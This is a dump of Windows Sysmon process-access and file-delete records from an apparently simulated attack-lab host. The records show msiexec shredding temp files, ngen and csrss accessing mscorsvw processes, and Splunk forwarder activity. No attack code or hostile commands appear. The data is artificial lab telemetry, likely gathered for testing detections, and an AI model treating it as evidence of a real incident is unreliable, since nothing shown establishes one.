14:58:30.246{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-580E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.246{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-580E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.208{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-570E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.197{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-570E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.197{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-570E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.156{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-560E-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.146{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-560E-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.146{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-560E-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=D4D8DA0357895E8CC3D6F8A61F7E3AEB,SHA256=A4F97281A764B38663F9C1F32E7F39985C41423BF98D37A1C4F6C03C517BDE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF39963DC0C90229DA.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF41C949B7F869E50C.TMPMD5=D4D8DA0357895E8CC3D6F8A61F7E3AEB,SHA256=A4F97281A764B38663F9C1F32E7F39985C41423BF98D37A1C4F6C03C517BDE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2948873E35E34F2B.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF4576536C88053A89.TMPMD5=D4D8DA0357895E8CC3D6F8A61F7E3AEB,SHA256=A4F97281A764B38663F9C1F32E7F39985C41423BF98D37A1C4F6C03C517BDE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.136{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF0AA6EA7FB8FCA5B6482D710AE95B42,SHA256=AB549D0B1F83BC1849163F413BD9137B9DBA40C978D5C214BD5E958793ED867E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.126{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=54A12689645F455BCD59303BADA9ABE6,SHA256=2FC0973B3AEDC5F2F94DE31BCA709299A4264C1F1C188F0BC93F693927D713C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.126{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d082a2.msiMD5=4A67BE63EE3A210DEAD1DFD56C3B87A8,SHA256=CF5AE9A4C62484F328FF20951678D7D795CBB0CA60BE43DDA1310FF02C2D50E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.126{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=4CEDD0555933E15AF468AF4C7400970F,SHA256=32B8A724E67332CF40BE2EE9604011A3270108A4A8EE6E434BA3A3405D73F2CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.110{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF14B8EC78B5AC6D8B.TMPMD5=521956A564E9EB373BCC4FB5E31EBA2A,SHA256=D673758682AB18C29B7F1782409EBA2219E2D004A7877A973FA5FD27A91E0403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.110{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF530A72E49DF2A3EA.TMPMD5=887FE57F8AB259D7748D2C849094F1DE,SHA256=9A8CE09D8160A7183884966AA170E455EDC90A58D0E104AD8C80DFD4D233FA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.109{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d082a4.rbsMD5=3C6E1A516D238E8DE21B0BBB9D38D096,SHA256=F2D307EDC997A248BA1EEB2781254AFF4143CAA39E3BEA423B7BC33901CD3746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.106{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF25D0A973305D865E.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.105{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF477B8ADA09F86BF8.TMPMD5=C2AAC7162D475A174F61D81E7FF37AA8,SHA256=6C5C629A0F23239A5C73D80ADF4FFD2234E75F0C35547A09D7D407998DCAAB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.101{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFFBB9356E89291D03.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 10341000x800000000000000079985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.100{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-550E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.100{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFFD3CD8E537571AD4.TMPMD5=C2AAC7162D475A174F61D81E7FF37AA8,SHA256=6C5C629A0F23239A5C73D80ADF4FFD2234E75F0C35547A09D7D407998DCAAB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIC6B7.tmpMD5=9D9FB44554EA67072191B8FFA5CCB540,SHA256=3F0BFA1051F3777CA5D76D01A99D9E4B03B0958CCC324A5EC070144AECDA6F1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-550E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-550E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64)|C:\Windows\SysWOW64\msiexec.exe+49d4|C:\Windows\SysWOW64\msiexec.exe+4ed8|C:\Windows\SysWOW64\msiexec.exe+6af7|C:\Windows\SysWOW64\msiexec.exe+7873 10341000x800000000000000079979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64)|C:\Windows\SysWOW64\msiexec.exe+49d4|C:\Windows\SysWOW64\msiexec.exe+4ed8|C:\Windows\SysWOW64\msiexec.exe+6af7|C:\Windows\SysWOW64\msiexec.exe+7873 10341000x800000000000000079978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64) 10341000x800000000000000079977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.076{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64)|C:\Windows\SysWOW64\msiexec.exe+49d4 10341000x800000000000000079976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 